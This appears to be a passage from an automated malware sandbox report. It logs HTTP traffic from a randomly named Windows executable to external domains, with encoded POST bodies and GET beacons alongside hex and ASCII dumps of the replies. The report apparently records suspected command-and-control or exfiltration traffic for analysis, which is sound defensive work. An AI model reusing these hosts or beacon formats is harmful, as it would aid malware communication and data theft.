                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 36 6f 6d 37 6c 6a 6c 41 35 61 79 32 4b 6e 54 44 49 39 7a 55 74 4e 50 6e 43 77 69 65 69 57 65 54 4f 78 45 55 31 53 65 37 77 2f 2f 31 6e 72 54 48 47 35 6d 72 6b 46 4d 4b 71 69 4a 66 4a 47 55 43 54 59 48 56 43 2f 76 71 7a 33 6f 42 2f 2b 6c 4f 57 36 33 63 6a 53 79 66 56 6a 6f 2f 58 70 47 38 2b 4b 42 6f 75 7a 74 55 36 74 6a 6a 45 33 58 73 77 59 42 65 63 41 65 63 63 42 50 64 6e 67 56 62 4f 71 2b 4b 36 2b 4a 31 35 36 4a 6c 6f 54 78 52 44 31 45 6d 76 7a 70 4c 33 53 76 75 50 48 45 34 61 79 35 4e 73 6c 6e 6e 7a 50 2f 2f 50 78 43 30 54 4e 39 2b 38 52 70 56 5a 69 68 36 52 30 72 61 63 48 4c 68 66 69 44 7a 65 47 76 57 41 79 66 4f 44 6e 4b 77 43 6f 38 51 56 6a 76 32 66 37 37 43 76 62 4f 4b 71 46 4f 32 39 67 66 61 48 75 63 47 45 33 56 4f 2f 4c 71 51 65 44 61 71 72 48 2f 65 45 36 50 70 69 41 39 62 73 30 63 69 75 66 51 63 47 4c 76 4b 47 62 51 4d 45 30 34 36 50 4d 7a 52 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZf6om7ljlA5ay2KnTDI9zUtNPnCwieiWeTOxEU1Se7w//1nrTHG5mrkFMKqiJfJGUCTYHVC/vqz3oB/+lOW63cjSyfVjo/XpG8+KBouztU6tjjE3XswYBecAeccBPdngVbOq+K6+J156JloTxRD1EmvzpL3SvuPHE4ay5NslnnzP//PxC0TN9+8RpVZih6R0racHLhfiDzeGvWAyfODnKwCo8QVjv2f77CvbOKqFO29gfaHucGE3VO/LqQeDaqrH/eE6PpiA9bs0ciufQcGLvKGbQME046PMzRMV/XxcSbXlOLLjhTbspqjWmGSHePlquSeVtQQADn92yxWP6Lp8vms1g1mdHFAaWI0o8CbWep7PbwumvpRCacrl1QsLB+VZnyY9nM4UNGL2aKvdKFlk8oAPtyqHmNAIGbXo1E89XjgJxcsqNbM6zDzDArFLMIqlZ0a8jjWc94z/sATkJmar7EMKW4eB4tRiUdWVS9mU6F1MLdo+Er29MRRz7NG1cWO+1zE5M/UZM88VPJARzWv16pyQF5zXyXqb7D8CWm9z/raS/y7Gs7lFBMqoy3maxTHoSVMs2KyNxEdJApCRsWM8B77vMlOmNGoS5+KDUVMgbwZjWAu1kN1Jt510yIRxGGeF6M5pcaeauFjkbJ7pFNpGuS7xoCtqU2QRucaPqj6JCeKBwWIVF0QodhsBQqxo55RVk255ohREpF21Jj431EFDj7ZAN+zh3oDNRQoks7AiYFhzqBqyOWA9YpKNYLr6W9ipp5bnjtc0zENR9AmGhFE+XxTNL6/EQSfb1EtSgzA6lsE74PUKXzDTeETN/LXJGloe+79vjKQFQ17CD9WtZE0ulunhg5Pq55HXUNHput00Fbw4RTKo8NeTWhmHmzh5uX5pPoK/WcawfM0q5ZePMIJTCXNwT8WNWFRoVueDWz66gZx/wkKr7XlnN8KI8YqjL3CUnCvP [TRUNCATED]
                                                                            Dec 6, 2024 17:37:44.065747976 CET481INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:43 GMT
                                                                            Server: Apache/2
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.1249849208.115.225.220805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:37:45.604543924 CET518OUTGET /gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.atendefacil.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:37:46.782130003 CET481INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:46 GMT
                                                                            Server: Apache/2
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.1249886172.67.162.39805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:01.163803101 CET790OUTPOST /k4tn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.sitioseguro.blog
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.sitioseguro.blog/k4tn/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 7a 53 67 32 4c 39 61 4b 52 5a 6e 5a 30 77 69 6b 4c 75 43 57 51 38 2b 68 7a 4c 70 77 67 44 35 6c 63 59 4a 64 35 6f 32 2b 4d 4a 34 41 49 53 50 6f 48 39 48 4f 76 6e 78 69 6d 77 6b 55 6c 64 4a 2b 47 75 47 53 47 48 75 39 59 41 79 58 39 42 44 61 74 4e 6f 37 71 78 4a 75 31 66 64 45 35 64 4f 45 38 30 77 2b 64 75 5a 4b 67 6a 31 69 6c 32 73 72 53 4a 72 77 36 34 34 31 50 70 2f 61 39 61 66 39 43 2b 73 4c 2b 4f 42 34 79 41 62 67 65 4e 41 4d 50 31 6a 4d 77 35 6b 2b 48 74 49 47 73 79 38 52 7a 6a 6e 55 65 57 37 75 64 73 72 36 63 31 2f 32 73 4a 65 6b 67 51 3d 3d
                                                                            Data Ascii: BHptZ6F=ZubRvge8VbTkzSg2L9aKRZnZ0wikLuCWQ8+hzLpwgD5lcYJd5o2+MJ4AISPoH9HOvnximwkUldJ+GuGSGHu9YAyX9BDatNo7qxJu1fdE5dOE80w+duZKgj1il2srSJrw6441Pp/a9af9C+sL+OB4yAbgeNAMP1jMw5k+HtIGsy8RzjnUeW7udsr6c1/2sJekgQ==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.1249892172.67.162.39805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:03.833421946 CET810OUTPOST /k4tn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.sitioseguro.blog
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.sitioseguro.blog/k4tn/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 69 43 51 32 47 36 4f 4b 54 35 6e 57 37 51 69 6b 51 65 43 53 51 38 79 68 7a 4f 4a 67 67 78 64 6c 63 36 42 64 32 4d 69 2b 4c 4a 34 41 47 79 50 70 5a 4e 48 52 76 6e 39 63 6d 30 34 55 6c 64 4e 2b 47 73 65 53 47 30 47 79 5a 51 79 56 31 68 44 59 69 74 6f 37 71 78 4a 75 31 62 38 52 35 64 47 45 38 6e 59 2b 64 50 5a 4a 6a 6a 31 74 30 32 73 72 46 5a 72 30 36 34 35 61 50 73 43 2f 39 5a 72 39 43 2b 63 4c 6e 2f 42 33 37 41 62 69 54 74 42 2f 66 77 2b 34 70 72 51 70 47 37 77 6e 73 77 67 4f 37 46 71 4f 42 6b 7a 34 49 76 2f 33 52 69 47 47 68 4b 6a 74 37 61 7a 35 51 6f 43 56 4c 69 2f 77 4c 52 6d 55 77 65 4f 75 58 32 77 3d
                                                                            Data Ascii: BHptZ6F=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxdlc6Bd2Mi+LJ4AGyPpZNHRvn9cm04UldN+GseSG0GyZQyV1hDYito7qxJu1b8R5dGE8nY+dPZJjj1t02srFZr0645aPsC/9Zr9C+cLn/B37AbiTtB/fw+4prQpG7wnswgO7FqOBkz4Iv/3RiGGhKjt7az5QoCVLi/wLRmUweOuX2w=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.1249898172.67.162.39805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:06.510576010 CET1823OUTPOST /k4tn/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.sitioseguro.blog
                                                                            Origin: http://www.sitioseguro.blog
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.sitioseguro.blog/k4tn/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 69 43 51 32 47 36 4f 4b 54 35 6e 57 37 51 69 6b 51 65 43 53 51 38 79 68 7a 4f 4a 67 67 78 56 6c 62 4a 5a 64 35 4c 65 2b 4b 4a 34 41 4f 53 50 6b 5a 4e 48 63 76 6e 6c 51 6d 30 30 62 6c 66 46 2b 47 4a 4b 53 41 46 47 79 57 51 79 56 33 68 44 56 74 4e 6f 55 71 78 5a 71 31 66 59 52 35 64 47 45 38 68 6b 2b 61 65 5a 4a 6c 6a 31 69 6c 32 73 76 53 4a 71 52 36 35 52 67 50 74 53 42 38 71 7a 39 43 65 4d 4c 38 70 39 33 30 41 62 6b 57 74 42 6e 66 77 36 6e 70 76 77 54 47 2f 34 42 73 79 67 4f 2f 7a 76 4a 46 31 2f 6c 4b 50 7a 57 43 52 4f 2f 6a 59 7a 77 32 6f 6a 36 54 76 53 6a 4f 52 58 6b 52 57 4c 6a 6f 4c 57 4e 42 67 59 74 46 66 5a 69 74 4d 48 6b 53 4f 75 63 52 50 50 44 32 78 71 4c 78 6d 72 6b 31 68 55 42 6f 76 61 38 71 36 61 48 36 70 76 70 42 4b 77 47 74 39 39 76 33 52 48 67 45 76 4d 41 30 6c 57 56 4a 70 46 41 4f 74 55 58 46 45 78 77 35 55 4f 61 54 64 7a 67 59 6c 49 47 41 38 33 50 54 57 4f 46 75 55 55 6e 79 77 75 5a 6a 48 4e 66 41 49 72 31 6b 34 7a 4c 72 54 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=ZubRvge8VbTkiCQ2G6OKT5nW7QikQeCSQ8yhzOJggxVlbJZd5Le+KJ4AOSPkZNHcvnlQm00blfF+GJKSAFGyWQyV3hDVtNoUqxZq1fYR5dGE8hk+aeZJlj1il2svSJqR65RgPtSB8qz9CeML8p930AbkWtBnfw6npvwTG/4BsygO/zvJF1/lKPzWCRO/jYzw2oj6TvSjORXkRWLjoLWNBgYtFfZitMHkSOucRPPD2xqLxmrk1hUBova8q6aH6pvpBKwGt99v3RHgEvMA0lWVJpFAOtUXFExw5UOaTdzgYlIGA83PTWOFuUUnywuZjHNfAIr1k4zLrTBSJLejX7n/oodWkO25j9OOTOqnmKagWft770HmTAL5Fo5gB0uxXF5U4oWn1LZFJIeV51rmRWZ8wHMXd7mZmDD/DilIh7hE0+l8kLOh+F9a4pPhVtFD0L7ZHU3dqvkxYT2gkmQVMo0VO3oGDBUJsMykVRhdAJphz9KO/TemyE9vqTuda02+bD3pT4LEjxCNbmQ+1M9VHRQz43tCSjb6t7h84weBGjzdSZyWbr0te21xV4UDA+A1z4WZ+OibhpMlFrulSaLivyJ/H0sfTQMdAM83WjqbU9a25vDF+HeB5HYwaFjG91nGnC5ZDeUOHdQuBWnAwYtqX6nGW6Te5e/iGC98g1mvjeBWrsJUeJ4TNlcrQW5lKTqCaMlQ96Mw/AncsOPVU2c1PPi9Zws+l2YtrHRt/FfXPUW0NvZGNCa1ie2JW1pATLhWXjUvYYrVuGb6XeTwhh/N7WV20zFk/XYh4ptUc8/Y/UNdwI3VKG1tQH35vPpu1CSAWsM81EklcCnbLTVvF3B2bjkbjauACOCyiVksIWqa+YHxfOGrZtT0lfOz2vFewCKC+WSiKwKf1P4fake4OaTF7yK+4gRmN25XP4dOPM6ks0gru+for1aMXuXyElNxNkWNjjJgGe/fcePCe8SeUQsRjPiyFzyrA4Qure7evCcuuaU9nKjS [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.1249908172.67.162.39805356C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 6, 2024 17:38:09.171531916 CET518OUTGET /k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.sitioseguro.blog
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Dec 6, 2024 17:38:11.821933985 CET1236INHTTP/1.1 200 OK
                                                                            Date: Fri, 06 Dec 2024 16:38:11 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                            Accept-Ranges: bytes
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2lGTZStjYhWCBqll1jtRlQvwmz5W%2FZyOMhryFF%2BaT5lvS2nrKgABPdf0m%2F2xi4KKl7Nvf%2BTaKSsKXuTtWoKBWcCMArTra5WjUfu6X3bVBJ2D%2FSP29EdgUEm3RgZ9RuHzBbH81iN7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8eddb4692c8972c2-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=518&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 62 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d [TRUNCATED]
                                                                            Data Ascii: b50<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,l
                                                                            Dec 6, 2024 17:38:11.821950912 CET1236INData Raw: 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f
                                                                            Data Ascii: abel{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-
                                                                            Dec 6, 2024 17:38:11.821973085 CET1236INData Raw: 2e 73 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77
                                                                            Data Ascii: .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-hei
                                                                            Dec 6, 2024 17:38:11.821984053 CET39INData Raw: 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 0d 0a
                                                                            Data Ascii: adding-left:.6875rem}.window-main__it
                                                                            Dec 6, 2024 17:38:11.852727890 CET1236INData Raw: 31 36 35 37 0d 0a 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d
                                                                            Data Ascii: 1657em{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding-l
                                                                            Dec 6, 2024 17:38:11.852749109 CET1236INData Raw: 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38
                                                                            Data Ascii: 78049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20re
                                                                            Dec 6, 2024 17:38:11.852761030 CET1236INData Raw: 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e
                                                                            Data Ascii: .625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem +
                                                                            Dec 6, 2024 17:38:11.852910995 CET1236INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f
                                                                            Data Ascii: argin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid
                                                                            Dec 6, 2024 17:38:11.852924109 CET783INData Raw: 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33 35 31 2e 34 30 35 20 34 30 39 2e 33 31 37 20 32 39 39 2e 38 34 31 20 34 33 39 2e 39 35 33 20 32 36 32 2e 38 39 36
                                                                            Data Ascii: 92 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filterUnits=
                                                                            Dec 6, 2024 17:38:11.885850906 CET1236INData Raw: 62 34 62 0d 0a 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72
                                                                            Data Ascii: b4b<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.
                                                                            Dec 6, 2024 17:38:11.942487001 CET1236INData Raw: 74 68 65 20 73 69 74 65 20 6f 6e 6c 79 20 77 6f 72 6b 73 20 77 69 74 68 20 49 50 76 34 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69
                                                                            Data Ascii: the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></d


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
